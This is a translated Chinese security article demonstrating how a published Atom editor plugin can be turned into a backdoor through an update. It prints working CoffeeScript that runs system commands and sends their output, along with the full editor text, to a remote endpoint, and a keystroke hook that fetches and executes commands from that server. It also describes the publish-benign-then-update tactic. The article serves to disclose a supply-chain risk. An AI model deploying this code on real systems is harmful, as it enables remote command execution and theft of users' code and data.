热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

【技术分享】如何通过恶意插件在Atom中植入后门

译者:nstlBlueSky预估稿费:200RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿背景在生活和工作中,我们往往都需要用到一些类型的编辑器,这样才能开展我们的工作。但


http://p5.qhimg.com/t01df330e093681e0e4.png

译者:nstlBlueSky

预估稿费:200RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

背景

在生活和工作中,我们往往都需要用到一些类型的编辑器,这样才能开展我们的工作。但是,当选择一个编辑器时,每个人都有自己的看法。有些人是新潮派,喜欢使用像Atom或者Sublime这一类型的现代编辑器,而另外一些人则是守旧派,更喜欢坚持使用像Vim或Emacs这一类型的编辑器。无论你选择什么,对于一款编辑器而言,你最想做的可能就是以某种方式对此工具进行自定义操作。

现代编辑器的插件和扩展功能都是非常强大的。除了外观上的一些自定义之外(字体,配色方案等),它们还提供了一系列功能,这些功能能够使您的生活和工作变得更轻松,您应该能够找到一个适合您需要的插件。如果没有,你可以创建和发布一个。

通常情况下,用户会下载新的插件以满足他们的需求,这样他们的插件列表就会变得越来越多(因为谁会有时间去删除那么旧的或者未使用的插件呢?)。这其中,许多编辑器是支持自动更新的,以确保及时的修复bug以及增添新功能等。

对于这篇文章,我将重点研究Atom这款编辑器工具Github上的“明星”编辑器。根据他们的网站介绍,这是一个“21世纪的黑客文本编辑器”。 Atom编辑器的用户群在不断增长,它包含了各种各样的软件包。您甚至可以通过一些小技巧在Chromebook上安装Atom,这些技巧是通过绕过ChromeOS上的基本安全模型,使得您可以在Chromebook上安装Atom。


目标

我的任务是探索恶意的Atom插件对该工具的影响程度到底有多大。我们不知道我们将要面临什么障碍,不知道Atom会不会有什么安全措施来阻止我们的恶意程序。但事实证明,没有任何的阻碍…在几个小时之内,我不仅发布了我的第一个应用程序,而且更新了它,在此应用程序中还包含有一点点的恶意代码。

计划很简单:

第一步:获取一个已经发布的简单的包或者插件

这个过程我们需要什么以及该过程是否有难度(我们是否需要我们的应用程序被审查)?

第二步:测试更新过程

如果你打算创建一个恶意软件包,那么你将首先需要创建一个非恶意软件包,这个非恶意的软件包需要拥有一个庞大的用户群,然后推送一个软件更新,该更新包中包含了一些恶意的代码

第三步:从Atom包中实际测试我们可以实现的功能

我们需要确定我们的恶意软件是否在沙箱中运行以及我们拥有访问哪些系统库的权限等。


创建简易插件

步骤1

网络上有很多指南可以用来指导如何创建和发布Atom的包,包括在Atom官方网站上就有一个很详细的指南。生成一个新的包需要的步骤是:

1.创建一个新的包:

cmd + shift + p

Package Generator: Generate Package 

2.步骤1将为我们生成一个简单的包,这个包只包含了一个toggle方法,这个方法我们将在稍后会使用到:

toggle: ->

console.log 'touch-type-teacher was toggled!'

3.将代码推送到Git 仓库

git init
git add .
git commit -m "First commit"
git remote add origin 
git push -u origin master

4.发布我们创建的Atom包

apm-beta publish minor

步骤2

在初始设置完成后,我们接下来将对我们之前创建的包做一些修改

toggle: ->

console.log 'touch-type-teacher was toggled!'
console.log 'update test'

将代码推送到Github

git commit -a -m 'Add console logging'
git push

发布新版本的代码

apm-beta publish minor

从第一步和第二步操作来看,发布和更新一个Atom包是非常容易的操作,下一步将看看我们发布的包实际上可以干些什么事情。


这似乎是一个合理的请求

步骤3

可以看到,Atom包是通过node.js技术创建的,初始测试我们可以看看有哪些模块可以访问。从请求包入手似乎是一个很好的开始,因为它允许我们将数据从用户的机器中取出并进入我们自己手中。

1.经过一番技术研究发现,可以很容易导入一个第三库到我们的包中:

npm install --save request@2.73.0
apm install

2.把这个第三库导入我们的代码中:

request = require 'request'

3.更新我们的代码,用户机器会将一些数据发布到我们的远程服务器

toggle: ->

request 'http://my-remote-endpoint.com/run?data=test_data', (error, response, body) =>            
console.log 'Data sent!'

有了这个,一旦toggle函数被调用,那么我们的包就会自动发送信息给我们。现在我们有一种获取信息的方法,我们需要看看我们能够访问哪些信息。


植入后门代码

我们更改我们的toggle函数尝试获取当前用户机器上的的数据,代码如下所示:

toggle: ->

{spawn} = require 'child_process'
test = spawn 'whoami'
test.stdout.on 'data', (data) ->
request 'http://my-remote-endpoint.com/run?data='+data.toString().trim(), (error, response, body) =>
console.log 'Output sent!'

上面的这个代码片段在实际的运行中是有效的,这意味着我们可以在用户的机器上运行命令,然后根据需要从返回的数据中提取我们需要的数据。其实现在,我们发布的Atom包已经可以执行一些恶意的操作了,但是我们有必要做进一步的研究。


更进一步

之前,我们的命令是硬编码到我们的代码中的,现在我们将修改代码使得软件能够自动发送需要执行的命令! 之前我们创建的Atom包中,只有toggle函数被调用时才会触发执行命令,现在我们将修改代码,完成一旦一个按键被按下就会触发执行命令的函数。

首先我们需要去hook当前编辑器的onChange事件:

module.exports = TouchTypeTeacher = 
touchTypeTeacherView: null 
modalPanel: null 
subscriptions: null 
editor: null
activate: (state) -> 
@touchTypeTeacherView = new TouchTypeTeacherView(state.touchTypeTeacherViewState) 
@modalPanel = atom.workspace.addModalPanel(item: @touchTypeTeacherView.getElement(), visible: false) 
@editor = atom.workspace.getActiveTextEditor() 
@subscriptions = new CompositeDisposable
@subscriptions.add atom.commands.add 'atom-workspace', 'touch-type-teacher:toggle': => @toggle() 
@subscriptions.add @editor.onDidChange (change) => @myChange()

之后,在Atom包中创建myChange函数,该函数将执行一些恶意的操作:

myChange: ->
    request 'http://my-remote-endpoint.com/test?data=' +@editor.getText(), (error, response, body) =>
        {spawn} = require 'child_process'
        test = spawn body
        console.log 'External code to run:n' + body
        test.stdout.on 'data', (data) ->
           console.log 'sending output'
           request 'http://my-remote-endpoint.com/run?data=' + data.toString().trim(), (error, response, body) =>
               console.log 'output sent!'

这段代码片段实现了我们想要完成的功能。 编辑器中每发生一个变化,我们都会将编辑器中的文本发送到我们的服务器,然后服务器会返回一个新的命令到用户的机器上执行。 我们运行命令并将执行结果发送到我们的服务器。

现实在存在的后门插件

虽然我们只是想演示这种攻击是如何发生的,但是现实中却出现了一个有趣的故事。Kite公司,一家生产基于云编码工具的软件公司,该公司招聘了Minimap(一个Atom插件,超过380万次下载)的开发人员,随后Minimap插件推出了一个更新,此更新除了其他功能之外,将Kite公司的广告插入到Minimap插件中。同样的,我们发现Kite公司在几个月前就默默地收购了autocomplete-python插件(另一个流行的Atom插件),以用来推广Kite公司的产品。

这个事情一经发现,Kite公司就被迫道歉并采取了相应的措施,以确保他们不会再这样做。但类似于Kite公司收购Atom包这种行为,在过去一周内有报道说,两个Chrome扩展已被网络攻击者利用,并向其中注入了广告软件。 Chrome和Copyfish的Web开发人员都将可能遭受网络钓鱼的攻击。有关这些事件的详细信息,请参阅这里(Web Developer)和这里(Copyfish),其主要原因是用户在不知情的情况了使用了有后门的Chrome的扩展程序。


总结

我们创建了一个插件,并发布了它,但这个插件并不具有任何的危害。此插件是在没有沙盒,没有任何权限限制的环境中运行的,而且也没有任何的防护去阻止我们窃取用户机器上的数据信息。即使安全研究人员会对上传的软件代码进行了某种分析,但攻击者也可以在软件运行时远程执行恶意代码。自动更新意味着即使我们的插件今天很好,但或许这款插件明天可能就会被植入了后门程序。

因此,虽然迫使开发人员仅使用某些可以控制的开发工具或者插件似乎看起来很不人性,但如果不受控制,我们将越来越难以确保这些工具的安全性。


推荐阅读
  • 对于一般的扩展包,我们一般直接pipinstallxxx即可安装,但是unrar直接安装后,发现并不能通过Python程序实现解压的功能& ... [详细]
  • FIN7后门工具伪装成白帽工具进行传播
    fin7,后门,工具,伪装,成,白, ... [详细]
  • MySQL5.6.40在CentOS764下安装过程 ... [详细]
  • 基于SSL的mysql服务器的主从架构实现说明:本文选用172.16.22.1作为主服务器,172.16.22.3作为从服务器从服务器的mysql软件版 ... [详细]
  • k8s进阶之搭建私有镜像仓库
    企业级私有镜像仓 ... [详细]
  • 今天凌晨开始苹果正式开始了iOS10的推送工作,使用iPhone和iPad的用户可 ... [详细]
  • 使用Ubuntu中的Python获取浏览器历史记录原文: ... [详细]
  • Voicewo在线语音识别转换jQuery插件的特点和示例
    本文介绍了一款名为Voicewo的在线语音识别转换jQuery插件,该插件具有快速、架构、风格、扩展和兼容等特点,适合在互联网应用中使用。同时还提供了一个快速示例供开发人员参考。 ... [详细]
  • Tomcat/Jetty为何选择扩展线程池而不是使用JDK原生线程池?
    本文探讨了Tomcat和Jetty选择扩展线程池而不是使用JDK原生线程池的原因。通过比较IO密集型任务和CPU密集型任务的特点,解释了为何Tomcat和Jetty需要扩展线程池来提高并发度和任务处理速度。同时,介绍了JDK原生线程池的工作流程。 ... [详细]
  • 本文介绍了如何使用python从列表中删除所有的零,并将结果以列表形式输出,同时提供了示例格式。 ... [详细]
  • 本文介绍了在Windows环境下如何配置php+apache环境,包括下载php7和apache2.4、安装vc2015运行时环境、启动php7和apache2.4等步骤。希望对需要搭建php7环境的读者有一定的参考价值。摘要长度为169字。 ... [详细]
  • Java学习笔记之面向对象编程(OOP)
    本文介绍了Java学习笔记中的面向对象编程(OOP)内容,包括OOP的三大特性(封装、继承、多态)和五大原则(单一职责原则、开放封闭原则、里式替换原则、依赖倒置原则)。通过学习OOP,可以提高代码复用性、拓展性和安全性。 ... [详细]
  • 本文介绍了Linux Shell中括号和整数扩展的使用方法,包括命令组、命令替换、初始化数组以及算术表达式和逻辑判断的相关内容。括号中的命令将会在新开的子shell中顺序执行,括号中的变量不能被脚本余下的部分使用。命令替换可以用于将命令的标准输出作为另一个命令的输入。括号中的运算符和表达式符合C语言运算规则,可以用在整数扩展中进行算术计算和逻辑判断。 ... [详细]
  • 单点登录原理及实现方案详解
    本文详细介绍了单点登录的原理及实现方案,其中包括共享Session的方式,以及基于Redis的Session共享方案。同时,还分享了作者在应用环境中所遇到的问题和经验,希望对读者有所帮助。 ... [详细]
  • Google在I/O开发者大会详细介绍Android N系统的更新和安全性提升
    Google在2016年的I/O开发者大会上详细介绍了Android N系统的更新和安全性提升。Android N系统在安全方面支持无缝升级更新和修补漏洞,引入了基于文件的数据加密系统和移动版本的Chrome浏览器可以识别恶意网站等新的安全机制。在性能方面,Android N内置了先进的图形处理系统Vulkan,加入了JIT编译器以提高安装效率和减少应用程序的占用空间。此外,Android N还具有自动关闭长时间未使用的后台应用程序来释放系统资源的机制。 ... [详细]
author-avatar
littl_eyuera
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有